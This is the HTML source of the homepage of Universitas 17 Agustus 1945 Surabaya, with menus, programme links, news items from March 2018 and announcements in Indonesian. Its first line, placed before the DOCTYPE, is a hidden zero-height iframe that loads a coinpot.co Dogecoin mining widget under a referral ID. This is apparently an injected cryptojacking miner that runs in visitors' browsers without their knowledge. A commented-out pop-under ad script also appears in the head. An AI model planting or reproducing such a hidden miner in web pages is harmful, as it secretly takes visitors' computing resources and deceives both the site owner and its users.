<iframe scrolling="no" frameborder="0" src="https://coinpot.co/mine/dogecoin/?ref=3519453352AF&mode=widget" style="overflow:hidden;height:0px;"></iframe>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<!--[if lt IE 7 ]><html class="ie ie6" lang="en"> <![endif]-->
<!--[if IE 7 ]><html class="ie ie7" lang="en"> <![endif]-->
<!--[if IE 8 ]><html class="ie ie8" lang="en"> <![endif]-->
<!--[if (gte IE 9)|!(IE)]><!--><html lang="en"> <!--<![endif]-->
<head>
<!--<meta name="propeller" content="f7a458860f20fd31860c78e0ddcf9a0e" /> iki adsense gag tau dari mana? masih diselidiki-->
<meta charset="utf-8" />
<title>Universitas 17 Agustus 1945 Surabaya</title>
<meta name="description" content="Universitas 17 Agustus 1945 Surabaya adalah perguruan tinggi swasta di Surabaya Indonesia yang didirikan pada 17 Agustus 1958.">
<meta name="keywords" content="">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
<meta http-equiv="Copyright" content="untag-sby.ac.id">
<meta name="author" content="untag-sby.ac.id">
<meta http-equiv="imagetoolbar" content="no">
<meta name="language" content="Indonesia">
<meta name="revisit-after" content="7">
<meta name="webcrawlers" content="all">
<meta name="rating" content="general">
<meta name="spiders" content="all">




<link media="screen" charset="utf-8" rel="stylesheet" href="templates/Untag-sBy_1945_17/css/base.css" />
<link media="screen" charset="utf-8" rel="stylesheet" href="templates/Untag-sBy_1945_17/css/skeleton.css" />
<link media="screen" charset="utf-8" rel="stylesheet" href="templates/Untag-sBy_1945_17/css/layout.css" />
<link media="screen" charset="utf-8" rel="stylesheet" href="templates/Untag-sBy_1945_17/css/child.css" />
<link media="screen" charset="utf-8" rel="stylesheet" href="templates/Untag-sBy_1945_17/css/tabs.css" />
<link media="screen" charset="utf-8" rel="stylesheet" href="templates/Untag-sBy_1945_17/css/paging.css" />
<link rel="stylesheet" href="templates/Untag-sBy_1945_17/css/jquery.lightbox-0.5" type="text/css" />

<link rel="stylesheet" href="templates/Untag-sBy_1945_17/css/nivo-slider.css" type="text/css" media="screen" charset="utf-8" />
<link rel="stylesheet" href="templates/Untag-sBy_1945_17/css/prettyPhoto.css.css" type="text/css" media="screen" charset="utf-8" />

<!--[if (IE 6)|(IE 7)]>
    <link rel="stylesheet" href="css/ie.css" type="text/css" media="screen" />
<![endif]-->
<!--[if lt IE 9]>
    <script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->



<script src="templates/Untag-sBy_1945_17/js/jquery-1-8-2.js" type="text/javascript"></script>
<!--<script type="text/javascript" src="//go.pub2srv.com/apu.php?zoneid=963438"></script>-->
<script src="templates/Untag-sBy_1945_17/js//default.js" type="text/javascript"></script>
<script src="templates/Untag-sBy_1945_17/js/jquery.easing.1.3.js" type="text/javascript"></script>
<script src="templates/Untag-sBy_1945_17/js/jquery.nivo.slider.pack.js" type="text/javascript"></script>
<script src="templates/Untag-sBy_1945_17/js/jquery.carousel.js" type="text/javascript"></script>
<script src="templates/Untag-sBy_1945_17/js/jquery.color.animation" type="text/javascript"></script>
<script src="templates/Untag-sBy_1945_17/js/jquery.prettyPhoto.js" type="text/javascript"></script>



<script src="templates/Untag-sBy_1945_17/js/jquery.lightbox-0.5.min.js" type="text/javascript"></script>



<!-- color pickers -->
<link rel="stylesheet" media="screen" type="text/css" href="templates/Untag-sBy_1945_17/css/colorpicker.css" />
<script src="templates/Untag-sBy_1945_17/js/colorpicker.js" type="text/javascript"></script>

<!-- end of color pickers-->

<!-- Gambar kecil di samping bawah
<style type="text/css">#gb{position:fixed;bottom:0px;right:0px;z-index:+1500;}* html #gb{position:relative;}

.gbcontent{float:right;border:5px solid #f58c00;background:#ffffff;padding:10px;}</style>
<script type="text/javascript">function showHideGB(){var gb = document.getElementById("gb");var w = gb.offsetWidth;gb.opened ? moveGB(0, 30-w) : moveGB(20-w, 0);gb.opened = !gb.opened;}function moveGB(x0, xf){var gb = document.getElementById("gb");var dx = Math.abs(x0-xf) > 10 ? 5 : 1;var dir = xf>x0 ? 1 : -1;var x = x0 + dx * dir-100;gb.style.bottom = x.toString() + "px";gb.style.right = x.toString() + "px";if(x0!=xf){setTimeout("moveGB("+x+", "+xf+")", 10);}}</script>
<div id="gb">
<div class="gbtab" onclick="showHideGB()"> </div>
<div class="gbcontent">
<div style="text-align:right"></div><center>
Klik Gambar Dibawah<p><p/><p><p/>

<a href="http://ika.untag-sby.ac.id/statis-6-jadwalreuni.html"><img src="images/Untag-Reuni-2015.jpg"></a>

</p></p></p></p>

<p><p/><a href="javascript:showHideGB()">.:[Tutup]:.</a></p></p></center><script type="text/javascript">var gb = document.getElementById("gb");gb.style.center = (20-gb.offsetWidth).toString() + "px";</script></div></div>

--> 


</head>

<body>



	
    <div class="page-wrapper">
        <div class="slug-pattern slider-expand">
            <div class="background-image" id="1"></div>
            <div class="overlay"><div class="slug-cut"></div>
        </div></div>
        <div class="header">
		
            <div class="nav">
           
			
                <div class="container">
				
                
                    <!-- Standard Nav (x >= 768px) -->
            <div class="standard">
			
			
                    
                        <div class="five column alpha">
                            <div class="logo">
                                <a href="http://untag-sby.ac.id"><img src="templates/Untag-sBy_1945_17/images/logountag.jpg" /></a></a><!-- Large Logo -->
                            </div>
							
                        </div>
                    
                     <div class="eleven column omega tabwrapper">
                            <div class="menu-wrapper">
                                  
											<ul class='tabs menu'><li><a href='http://untag-sby.ac.id'>Home</a>
             <ul class='child'></ul>
            </li><li><a href='#'>Profile</a>
             <ul class='child'>  <li><a href='statis-3-visimisi.html' target='_blank'> Visi, Misi & Tujuan</a></li>  <li><a href='statis-2-visidanmisi.html' target='_blank'> Sejarah</a></li>  <li><a href='statis-11-pataka.html' target='_blank'> Pataka</a></li>  <li><a href='statis-12-lambang.html' target='_blank'> Lambang</a></li>  <li><a href='statis-15-hymne&marsuntag.html' target='_blank'> Hymne & Mars Untag</a></li>  <li><a href='statis-16-pimpinan.html' target='_blank'> Pimpinan</a></li>  <li><a href='statis-19-profilgurubesar.html' target='_blank'> PROFIL GURU BESAR</a></li>  <li><a href='statis-28-susunansenatuniversitas.html' target='_blank'> Susunan Senat Universitas</a></li>  <li><a href='statis-63-fasilitas.html' target='_blank'> Fasilitas</a></li>  <li><a href='statis-70-strukturorganisasi.html' target='_blank'> Struktur Organisasi</a></li>  <li><a href='statis-73-campuslife.html' target='_blank'> Campus Life</a></li>  <li><a href='statis-74-internationalstudentsandscholars.html' target='_blank'> International Students And Scholars</a></li>  <li><a href='statis-75-campushealthandsportfacilities.html' target='_blank'> Campus Health And Sport Facilities</a></li></ul>
            </li><li><a href='#'>Fakultas</a>
             <ul class='child'>  <li><a href='http://fisip.untag-sby.ac.id' target='_blank'> Fakultas Ilmu Sosial Dan Ilmu Politik</a></li>  <li><a href='http://fh.untag-sby.ac.id' target='_blank'> Fakultas Hukum</a></li>  <li><a href='http://fe.untag-sby.ac.id' target='_blank'> Fakultas Ekonomi</a></li>  <li><a href='http://psikologi.untag-sby.ac.id' target='_blank'> Fakultas Psikologi</a></li>  <li><a href='http://ft.untag-sby.ac.id' target='_blank'> Fakultas Teknik</a></li>  <li><a href='http://sastra.untag-sby.ac.id' target='_blank'> Fakultas Sastra</a></li></ul>
            </li><li><a href='#'>Program Studi</a>
             <ul class='child'>  <li><a href='http://publik.untag-sby.ac.id' target='_blank'> Administrasi Negara (S1)</a></li>  <li><a href='http://bisnis.untag-sby.ac.id' target='_blank'> Administrasi Niaga (S1)</a></li>  <li><a href='http://komunikasi.untag-sby.ac.id' target='_blank'> Ilmu Komunikasi (S1)</a></li>  <li><a href='http://madm.untag-sby.ac.id' target='_blank'> Magister Administrasi (S2)</a></li>  <li><a href='http://dia.untag-sby.ac.id' target='_blank'> Doktor Ilmu Administrasi (S3)</a></li>  <li><a href='http://manajemen.untag-sby.ac.id' target='_blank'> Ekonomi Manajemen (S1)</a></li>  <li><a href='http://akuntansi.untag-sby.ac.id' target='_blank'> Ekonomi Akuntansi (S1)</a></li>  <li><a href='http://ep.untag-sby.ac.id' target='_blank'> Ekonomi Pembangunan (S1)</a></li>  <li><a href='http://mm.untag-sby.ac.id' target='_blank'> Magister Manajemen (S2)</a></li>  <li><a href='http://die.untag-sby.ac.id' target='_blank'> Doktor Ilmu Ekonomi (S3)</a></li>  <li><a href='http://industri.untag-sby.ac.id' target='_blank'> Teknik Industri (S1)</a></li>  <li><a href='http://sipil.untag-sby.ac.id' target='_blank'> Teknik Sipil (S1)</a></li>  <li><a href='http://mesin.untag-sby.ac.id' target='_blank'> Teknik Mesin (S1)</a></li>  <li><a href='http://arsitektur.untag-sby.ac.id' target='_blank'> Teknik Arsitektur</a></li>  <li><a href='http://elektro.untag-sby.ac.id' target='_blank'> Teknik Elektro (S1)</a></li>  <li><a href='http://informatika.untag-sby.ac.id' target='_blank'> Teknik Informatika (S1)</a></li>  <li><a href='http://mt.untag-sby.ac.id' target='_blank'> Magister Teknik (S2)</a></li>  <li><a href='http://inggris.untag-sby.ac.id' target='_blank'> Sastra Inggris (S1)</a></li>  <li><a href='http://jepang.untag-sby.ac.id' target='_blank'> Sastra Jepang (S1)</a></li>  <li><a href='http://hukum.untag-sby.ac.id' target='_blank'> Ilmu Hukum (S1)</a></li>  <li><a href='http://mih.untag-sby.ac.id' target='_blank'> Magister Ilmu Hukum (S2)</a></li>  <li><a href='http://dih.untag-sby.ac.id' target='_blank'> Doktor Ilmu Hukum (S3)</a></li>  <li><a href='http://spsi.untag-sby.ac.id' target='_blank'> Psikologi (S1)</a></li>  <li><a href='http://mapro.untag-sby.ac.id' target='_blank'> Psikologi Jenjang Profesi (S2)</a></li>  <li><a href='http://mpsi.untag-sby.ac.id' target='_blank'> Magister Psikologi (S2)</a></li></ul>
            </li><li><a href='#'>Unit Kerja</a>
             <ul class='child'>  <li><a href='http://lppm.untag-sby.ac.id/' target='_blank'> lembaga Penelitian Dan Pengabdian Pada Masyarakat</a></li>  <li><a href='http://bpm.untag-sby.ac.id' target='_blank'> Badan Penjaminan Mutu</a></li>  <li><a href='http://bsiuntag-sby.com' target='_blank'> Badan Sistem Informasi</a></li>  <li><a href='http://lib.untag-sby.ac.id' target='_blank'> Badan Perpustakaan</a></li>  <li><a href='http://jpc.untag-sby.ac.id' target='_blank'> Untag Career Center</a></li>  <li><a href='http://kemahasiswaan.untag-sby.ac.id/' target='_blank'> Bagian Kemahasiswaan</a></li>  <li><a href='statis-64-komiteetik.html' target='_blank'> Komite Etik</a></li>  <li><a href='statis-69-lspmerahputih.html' target='_blank'> LSP Merah Putih</a></li>  <li><a href='http://kuk.untag-sby.ac.id/' target='_blank'> Kantor Urusan kerjasama</a></li></ul>
            </li><li><a href='#'>Link</a>
             <ul class='child'>  <li><a href='http://akreditasi.untag-sby.ac.id' target='_blank'> SIM AKREDITASI</a></li>  <li><a href='http://dosen.untag-sby.ac.id/' target='_blank'> SITE DOSEN</a></li>  <li><a href='http://sim.untag-sby.ac.id/front/gate/index.php?page=menu#admin' target='_blank'> SIM AKADEMIK</a></li>  <li><a href='http://simagenda.untag-sby.ac.id/home' target='_blank'> SIM AGENDA</a></li>  <li><a href='http://portal.untag-sby.ac.id/' target='_blank'> Portal SIM Untag</a></li>  <li><a href='http://aipt.untag-sby.ac.id/' target='_blank'> Manajemen Presentasi</a></li>  <li><a href='http://pengaduan.untag-sby.ac.id' target='_blank'> Pengaduan</a></li>  <li><a href='https://drive.google.com/open?id=0BxJjV_Zl557DRVhwSWVfMkJQRTA' target='_blank'> Laporan Auditor Independen</a></li>  <li><a href='http://sivil.untag-sby.ac.id' target='_blank'> SIVIL</a></li>  <li><a href='http://124.81.224.138/elearning' target='_blank'> Elearning 1</a></li>  <li><a href='http://124.81.224.138/elearninguas' target='_blank'> Elearning 2</a></li></ul>
            </li><li><a href='http://lppm.untag-sby.ac.id'>Penelitian</a>
             <ul class='child'>  <li><a href='statis-72-untagsurabayaresilienceinstitute.html' target='_blank'> Untag Surabaya Resilience Institute</a></li></ul>
            </li><li><a href='hubungi-kami.html'>Kontak Kami</a>
             <ul class='child'></ul>
            </li></ul><div id="google_translate_element"></div><script type="text/javascript">
function googleTranslateElementInit() {
  new google.translate.TranslateElement({pageLanguage: 'id', layout: google.translate.TranslateElement.InlineLayout.SIMPLE}, 'google_translate_element');
}
</script><script type="text/javascript" src="//translate.google.com/translate_a/element.js?cb=googleTranslateElementInit"></script>
<!-- <div id="google_translate_element"></div><script type="text/javascript">
function googleTranslateElementInit() {
  new google.translate.TranslateElement({pageLanguage: 'id'}, 'google_translate_element');
}
</script><script type="text/javascript" src="//translate.google.com/translate_a/element.js?cb=googleTranslateElementInit"></script> -->									
                                                           
							</div>
                     </div>
            </div>
                     <!-- Standard Nav Ends, Start of Mini -->
                    
                    <div class="mini">
                        <div class="twelve column alpha omega mini">
                            <div class="logo">
                                <a href="http://untag-sby.ac.id"><img src="templates/Untag-sBy_1945_17/images/logountag.jpg" /></a><!-- Small Logo -->
                            </div>
                        </div>
                        
                        <div class="twelve column alpha omega navagation-wrapper">
                            <select class="navagation">
                                <option value="" selected="selected">Pilih Menu.</option>
                            </select>
                        </div>
                    </div>
                    <!-- Start of Mini Ends -->
                </div> 
                
            </div>
            
              <div class="shadow"></div>
            <div class="container">
                <div class="page-title">
                    <div class="rg"></div>
					 
                    <h1>Welcome to University Of 17 Agustus 1945 Surabaya</h1>
                </div>
				<a href="http://untag-sby.ac.id/m">Mobile Version</a> 
            </div>
        </div>
        
        <div class="body">
            <div class="body-round"></div>
            <div class="body-wrapper">
                <div class="side-shadows"></div>
				 
                <div class="content">
			<div class="nivoWrapper">
                        <div class="nivo-crop"></div>
                        <div class="preload">
                            <center><img src="templates/Untag-sBy_1945_17/images/design/preloader.gif" /></center>
							
                        </div>
            <div class="nivo hide"><a href="" target="_blank"><img src="img_slider/Flash-Banner-Web-Karier (1).jpg" alt=" | "/></a><a href="http://" target="_blank"><img src="img_slider/IMG-20180319-WA0041.jpg" alt=" | "/></a><a href="http://" target="_blank"><img src="img_slider/Header Perwalian.jpg" alt=" | "/></a><a href="http://untag-sby.ac.id" target="_blank"><img src="img_slider/1.jpg" alt=" | "/></a><a href="http://untag-sby.ac.id/statis-3-visimisi.html" target="_blank"><img src="img_slider/1 copy.jpg" alt=" | "/></a><a href="http://www.untag-sby.ac.id/" target="_blank"><img src="img_slider/alimarkus.jpg" alt=" | "/></a><a href="http://www.untag-sby.ac.id" target="_blank"><img src="img_slider/untag.jpg" alt=" | "/></a></div>

                        <div class="nivo-crop-bottom"></div>
                    </div>
					
                    <div class="container callout">
					<!-----batas
					<div class="sixteen columns">
                            <h4><span>PENGUMUMAN</span><br />PERPANJANGAN MASA PERWALIAN SEMESTER GENAP 2015/2016</h4>
                            <p class="subtitle">Dengan telah berakhirnya masa perpanjangan perwalian Semester Genap Genap Tahun 2015/2016 tanggal 10 Februari 2016, bagi mahasiswa yang belum mengikuti perwalian atau sudah mengambil Cuti Studi Sementara, maka untuk Semester Genap Tahun 2015/2016 ini masih diberikan kesempatan mengikuti perwalian KRS dengan jadwal sbb:

								<br/><center><h4><span>Tanggal 2-6 Maret 2016</span></h4></center><br/>

								Syarat mengikuti perpanjangan perwalian Semester Genap Tahun 2015/2016 adalah:.</p>
								<p>1.Sudah membayar uang kuliah dan Registrasi bulan Februari 2016</p>
								<p>2. Bagi yang sudah mengambil Cuti Studi Sementara, terlebih dahulu mengajukan pembatalan cuti ke Bagian Admisi dan Registrasi (BAR) baru dapat perwalian.</p>							
								<p>3.Pengambilan Mata Kuliah, sepanjang kelas masih memungkinkan.</p>	<br//><br/>						
					</div>
					---->
               <!--        <div class="callout intext">
                        
                                <div class="alpha twelve columns">
                                    <div class="content">
                                        <h4>Pengumuman!</h4>
                                        <p class="subtitle">Diberitahukan Kepada Seluruh Mahasiswa Strata 1.</p>
                                        <p>Syarat mengikuti perwalian semester genap 2016/2017:</p>

                                        <p>
                                        1. Lunas Pembayaran Uang Kuliah Bulan Februari 2017<br />
                                        2. Pembayaran Registrasi dibayarkan dengan pembayaran uang kuliah bulan Maret 2017<br />
                                        3. Hal berkaitan teknis dan lupa password dapat menghubungi email : bsi@untag-sby.ac.id
                                        </p>
                                        	
										<hr>
										
								   </div>
                                </div>
                                
                             
                                
                                <div class="clear"></div>
                            </div> -->
        <!--             <div class="omega twelve columns">
                                   <div class="intext-button">
                                        <a href="http://sim.untag-sby.ac.id" class="big-button"><span>KLIK DISINI UNTUK LINK KE SISTEM INFORMASI AKADEMIK</span></a>
                                      
                                   </div>
                                </div> -->

<div class="block-icons">
                            <div class="one-third column">
                                <div class="icon">
                                    <div class="symbol cap"></div>
                                   <a href="statis-13-pendaftaranprogramsarjana(s1).html"> <h5>PROGRAM SARJANA</h5>
                                    <p>
                                        Persyaratan & Biaya Pendidikan Program Sarjana (S1) .
                                    </p></a>
                                  
                                </div>
                            </div>
                            <div class="one-third column">
                                <div class="icon">
                                    <div class="symbol cap"></div>
                                    <a href="statis-14-pendaftaranprogrammagister(s2).html" > <h5>PROGRAM MAGISTER</h5>
                                    <p>
                                        Persyaratan & Biaya Pendidikan Program Magister (S2) .
                                    </p></a>
                                </div>
                            </div>
                           <div class="one-third column">
                                <div class="icon">
                                    <div class="symbol cap"></div>
                                   <a href="statis-9-pendaftaranprogramdoktor(s-3).html"> <h5>PROGRAM DOCTOR</h5>
                                    <p>
                                        Persyaratan & Biaya Pendidikan Program Doctor (S3) .
                                    </p></a>
                                </div>
                            </div>
                        </div>





                     <div class="clear"></div>
                        <div class="two-thirds column alpha">
                            <h4>A University Partner of <span>UN Habitat</span><br /> An Empowering and Networking University</h4>
                            <p class="subtitle">and a networking university striving for education excellence,to build a humane and just society.</p>
							
							
                        </div>
                        
                        <div class="four columns button-wrap">
						
						<div class="wrapper"><!-- <a href="https://unhabitat.org/"><span><img src="images/UN-Habitat.png" width="60%" height="60%" ></a></span></a> --></div>
                   
                        </div>
                    </div>
                        
                   <div class="container">
				   <!--batas-->
                    <div class="block-icons">
                            <div class="one-third column">
                                <div class="icon">
                                   <div><center><img src="images/edu.png"></center></div>
                                   <a href=""> <h5>EDUCATION</h5>
                                    <p>Undergraduate, Post-graduate in Social Sciences & Politics, Economics, Engineering, Law, Literature, and Psychology.
                                    
                                    </p></a>
                                  
                                </div>
                            </div>
                            <div class="one-third column">
                                <div class="icon">
                                    <div><center><img src="images/riset.png"></center></div>
                                    <a href=""> <h5>RESEARCH</h5>
                                    <p>
                                         Interdisciplinary research, design and prototyping.
                                    </p></a>
                                </div>
                            </div>
                           <div class="one-third column">
                                <div class="icon">
                                   <div><center><img src="images/com.png"></center></div>
                                   <a href="#"> <h5>COMMUNITY SERVICES</h5>
                                    <p>
                                       A collaboration with the city of Surabaya.
                                    </p></a>
                                </div>
                            </div>
                        </div>
				   
				   
				   
				   
				   
                   
                   <!--batas-->
					
                    
					
					
                    <!--batas-->   
                       
                            <span class="empty-hr"></span>
							
							
							
							
							 <div class="content">
                    <div class="container callout standard">
                        
                        <div class="twelve columns">
                            <h4>Berita Terbaru</h4>
                           
                        </div>
                        
                        <div class="two columns button-wrap">
                             <div class="wrapper search">
                            
<form  method="POST" id="searchform" action="hasil-pencarian.html">
<input type="text" name="kata" class="search-box" placeholder="Pencarian ..."><input type="image" src="templates/Untag-sBy_1945_17/images/design/search-icon.png" class="searchbox-submit" value=""/></form>
                            </div>	
                        </div>
                    </div>
                    <div class="callout-hr"></div>                        
                    <div class="container">
                    
                        <div class="eleven columns">
                            <div class="blog style-4">
						

<!--
digunakan untuk pita biru diatas gambar utama
<p><span class=tanggal>$t[hari], $tgl - $t[jam]</span></p>
-->

						
              
						<div class='border'>
							<div class='meta'>
								
							</div>
					<ul><li>
                          <img class='scale-with-grid' src=foto_berita/medium_28PENULISANBUKUAJAR.jpg />
						</div>
						
                        <div class='description'>
						 <h5><a href='berita-1926-buku-ajar-mahasiswa-memudahkan-untag-menuju-50-besar.html'>BUKU AJAR MAHASISWA MEMUDAHKAN UNTAG MENUJU 50 BESAR</a></h5>
							<div class='info'>
								DIBACA: 82 kali || Tgl : 20 Maret 2018 Jam 09:15:02
                                        
							</div>		
								<p>Guna mendorong pembuatan Buku Ajar Mahasiswa, Lembaga Penelitian dan Pengabdian Masyarakat (LPPM) UNTAG Surabaya mengadakan ... <a href=berita-1926-buku-ajar-mahasiswa-memudahkan-untag-menuju-50-besar.html>Selengkapnya</a></p><br/><br/>
                        </div>
						 <div class='clear'></div>
                            <!-- Blog Ends -->
                    </li></ul>
						<div class='border'>
							<div class='meta'>
								
							</div>
					<ul><li>
                          <img class='scale-with-grid' src=foto_berita/medium_31EKANTIN.jpg />
						</div>
						
                        <div class='description'>
						 <h5><a href='berita-1925-smatag-surabaya-tinggalkan-model-pembayaran-tradisional-dengan-e--kantin.html'>SMATAG SURABAYA TINGGALKAN MODEL PEMBAYARAN TRADISIONAL DENGAN E - KANTIN</a></h5>
							<div class='info'>
								DIBACA: 39 kali || Tgl : 20 Maret 2018 Jam 09:03:41
                                        
							</div>		
								<p>Surabaya &ndash; Dalam rangka mensukseskan Gerakan Nasional Non Tunai (GNNT) himbauan Bank Indonesia, Sekolah Menengah Atas 17 Agustus ... <a href=berita-1925-smatag-surabaya-tinggalkan-model-pembayaran-tradisional-dengan-e--kantin.html>Selengkapnya</a></p><br/><br/>
                        </div>
						 <div class='clear'></div>
                            <!-- Blog Ends -->
                    </li></ul>
						<div class='border'>
							<div class='meta'>
								
							</div>
					<ul><li>
                          <img class='scale-with-grid' src=foto_berita/medium_53MAPRO.jpg />
						</div>
						
                        <div class='description'>
						 <h5><a href='berita-1924-fakultas-psikologi-selenggarakan-workshop-“how-to-deal-with-difficult-people”.html'>FAKULTAS PSIKOLOGI SELENGGARAKAN WORKSHOP “HOW TO DEAL WITH DIFFICULT PEOPLE”</a></h5>
							<div class='info'>
								DIBACA: 36 kali || Tgl : 20 Maret 2018 Jam 08:41:41
                                        
							</div>		
								<p>Surabaya &ndash; Guna peningkatan kompetensi empat tahun kedepan, Magister Psikologi Profesi UNTAG Surabaya gelar Workshop &ldquo;How ... <a href=berita-1924-fakultas-psikologi-selenggarakan-workshop-“how-to-deal-with-difficult-people”.html>Selengkapnya</a></p><br/><br/>
                        </div>
						 <div class='clear'></div>
                            <!-- Blog Ends -->
                    </li></ul><div class='pages'><span class='nextprev'><< First</span><span class='nextprev'>< Prev </span>   <span class='current'><b>1</b></span><a href=halberita-2.html>2</a>  <a href=halberita-3.html>3</a>  <span class='nextprev'>...</span><a href=halberita-138.html>138</a>  <a href=halberita-2.html class='nextprev'>Next ></a>
<a href=halberita-138.html class='nextprev'>Last >></a>  </div><br /><br />              
			  
                                <div class="clear"></div>
                            </div><!-- Blog Ends -->
                            
                            
							
					
							
							
							
							
							
							
                        </div>
                        <div class="four columns">
                            <div class="sidebar">
                                <div class="sideborder"></div>
                                <h5>Terpopuler</h5>
                                <ul class="blogs">
								
								<li><div class='border'><img src='foto_berita/small_4645gb-fh-visitasi-akreditasi.jpg' width='40' height='40' alt=''> </div><a href='berita-1516-visitasi-akreditasi--prodi-hukum-s1-fh-untag-surabaya-diharapkan-mendapat-nilai-maksimal-.html'>Visitasi Akreditasi  Prodi Hukum S1 FH U.....  <span>  (44790)</span> </a>
												<br>
												<p><span>27 September 2016</span></p><div class='clear'></div></li><li><div class='border'><img src='foto_berita/small_1168gb-dra-i-a-sri-brahmayanti.jpg' width='40' height='40' alt=''> </div><a href='berita-1801-cerdas-dalam-mengelola-keuangan.html'>Cerdas dalam Mengelola Keuangan.....  <span>  (19200)</span> </a>
												<br>
												<p><span>12 Juni 2017</span></p><div class='clear'></div></li><li><div class='border'><img src='foto_berita/small_60makro ekonomi.jpg' width='40' height='40' alt=''> </div><a href='berita-1797-pengaruh-kebijakan-moneter-terhadap-inflasi-dalam-berbagai-sektor-komoditas.html'>Pengaruh Kebijakan Moneter Terhadap Infl.....  <span>  (11818)</span> </a>
												<br>
												<p><span>07 Juni 2017</span></p><div class='clear'></div></li><li><div class='border'><img src='foto_berita/small_73IMG-20170530-WA0022.jpg' width='40' height='40' alt=''> </div><a href='berita-1799-mahasiswa-untag-surabaya-wakili-jawa-timur-dalam-lomba-pidato-bahasa-jepang-tingkat-nasional.html'>Mahasiswa Untag Surabaya Wakili Jawa Tim.....  <span>  (6458)</span> </a>
												<br>
												<p><span>07 Juni 2017</span></p><div class='clear'></div></li> 
					
                                </ul><div class="clear"></div>
                               
                                
                               
                                
                                
                             


                                <h5>Tag Untag</h5>
                                <ul class="cloud">
                                     <li><a href='tag-14-universitas.html' 
style='font-size:%'>Universitas</a>      <li><a href='tag-15-informasi.html' 
style='font-size:%'>Informasi</a>      <li><a href='tag-16-media.html' 
style='font-size:%'>Media</a>      <li><a href='tag-17-hasil-karya.html' 
style='font-size:%'>Hasil Karya</a>      <li><a href='tag-19-artikel.html' 
style='font-size:%'>Artikel</a>      <li><a href='tag-21-untagtual.html' 
style='font-size:%'>Untagtual</a>      <li><a href='tag-22-berita.html' 
style='font-size:%'>berita</a>      <li><a href='tag-23-karya-ilmiah.html' 
style='font-size:%'>karya ilmiah</a>      <li><a href='tag-24-prestasi.html' 
style='font-size:%'>Prestasi</a>     <br />


</li>
                                    <div class="clear"></div>
                                </ul>
                            </div>
                        </div>    
                                
                        <div class="clear"></div>
                                            
                        
        
                    </div>
                </div>
							
							
							
							
	<!--batas-->
                   
                 
                   
                   <!--batas -->
                   
                      <div class="callout-hr"></div>                        
                   <div class="container">
                   <!--batas-->
                  
                   
                   
                   
                   						
							
							
							
							
							
								
							
							
							
							
							
							
							
							
							
							
							
							
							
							
							
							
							
							
							
							
							
							
							
							
							
							
							
							
							
							
							
							
							
							
							
							
							
							
							
							<div class="sixteen columns">
                    	<div class="title-wrapper">
                            <div class="section-title">
                                <h4 class="title">Info <strong>Untag</strong></h4>
                            </div>
                            <span class="divider"></span>
                            <div class="clear"></div>
                        </div>
                        <div class="four columns alpha">
                        	<ul class="pricing">
                            	<li class="title">
							<center>PENGUMUMAN</center></li>
                                <li class="price">
                                	<li><p><b><a href='berita-1905-pengumuman-hasil-pelelangan-pekerjaan.html' data-toggle='tooltip' data-placement='right' title=' ...'>PENGUMUMAN HASIL PELELANGAN PEKERJAAN</a></b></p></li><li><p><b><a href='berita-1893-pengumuman-pelelangan-pekerjaan.html' data-toggle='tooltip' data-placement='right' title=' ...'>PENGUMUMAN PELELANGAN PEKERJAAN</a></b></p></li><li><p><b><a href='berita-1892-pengumuman-hasil-lelang-pekerjaan.html' data-toggle='tooltip' data-placement='right' title=' ...'>PENGUMUMAN HASIL LELANG PEKERJAAN</a></b></p></li>	
                                </li> 
								 <li class="purchase"><div class="button-wrap"><center><a href="http://untag-sby.ac.id/kategori-37-.html" class="medium-button button"><span>Semua Pengumuman</span></a></div></li>
                            </ul>
                        </div>
                         <div class="four columns">
                        	<ul class="pricing">
                            	<li class="title">Untag On Media</li>
                                <li class="price">
                                	<li><p><b><a href='berita-1891-test-psikologi-jadi-ujian-terberat-calon-pemimpin-pilkada-.html' data-toggle='tooltip' data-placement='right' title='BERSAMA DR.ANDIK MATULESSY (Dosen Psikologi UNTAG SURABAYA) selaku KOORDINATOR TIM PELAKSANAAN TES PSIKOLOG PILKADA ...'>TEST PSIKOLOGI JADI UJIAN TERBERAT CALON PEMIMPIN PILKADA </a></b></p></li><li><p><b><a href='berita-1834-bijak-dalam-menggunakan-media-sosial.html' data-toggle='tooltip' data-placement='right' title=' ...'>BIJAK DALAM MENGGUNAKAN MEDIA SOSIAL</a></b></p></li><li><p><b><a href='berita-1499-jtv-mhs-untag-ciptakan-parkir-otomatis-.html' data-toggle='tooltip' data-placement='right' title='
https://youtu.be/YRrkTWYar2c
 ...'>JTV MHS UNTAG CIPTAKAN PARKIR OTOMATIS </a></b></p></li>	
                                </li>
                                <li class="purchase"><div class="button-wrap"><a href="http://untag-sby.ac.id/kategori-2-.html" class="medium-button button"><span>Semua Informasi</span></a></div></li>
                            </ul>
                        </div>
                         <div class="four columns">
                        	<ul class="pricing">
                         	
                            	<li class="title">Artikel</li>
                                <li class="price">
                                <li><p><b><a href='berita-1086-diklat-ukm-musik-ke30-lebih-menekankan-kepada-peserta-bisa-menciptakan-lagu.html' data-toggle='tooltip' data-placement='right' title='

Unit
Kegiatan Mahasiswa (UKM) Musik Universitas 17 Agustus 1945 Surabaya mengadakan Technical Meeting untuk
Diklat tahun 2015 di Ruang Meeting Room 1, Gedung Graha Wiyata lantai 1, ...'>Diklat UKM Musik Ke-30 Lebih Menekankan Kepada Peserta Bisa Menciptakan Lagu</a></b></p></li><li><p><b><a href='berita-1085-ukm-elcc-gelar-talk-show-“-cross-cultural-with-oklahoma-university-students-usa-”.html' data-toggle='tooltip' data-placement='right' title='

Kemarin, (17/11/15), Unit
Kegiatan Mahasiswa (UKM) English Language Community Center (ELCC) untag
Surabaya menggelar talk show &ldquo; Cross Cultural With Oklahoma University Students
USA ...'>UKM ELCC Gelar talk show “ Cross Cultural With Oklahoma University Students USA ”</a></b></p></li><li><p><b><a href='berita-1083-seminar-“dari-gerobak-jadi-alphard”-menumbuhkan-semangat-mahasiswa-menjadi-pengusaha.html' data-toggle='tooltip' data-placement='right' title='

Seminar bertajuk &quot;
Program Entrepreneur : Dari Gerobak Jadi Alphard &quot; oleh Arie Gaspol yang
di selenggarakan Fakultas Ekonomi Untag Surabaya memumbuhkan semangat mahasiswa
menjadi ...'>Seminar “Dari Gerobak Jadi Alphard” Menumbuhkan Semangat Mahasiswa Menjadi Pengusaha</a></b></p></li>	
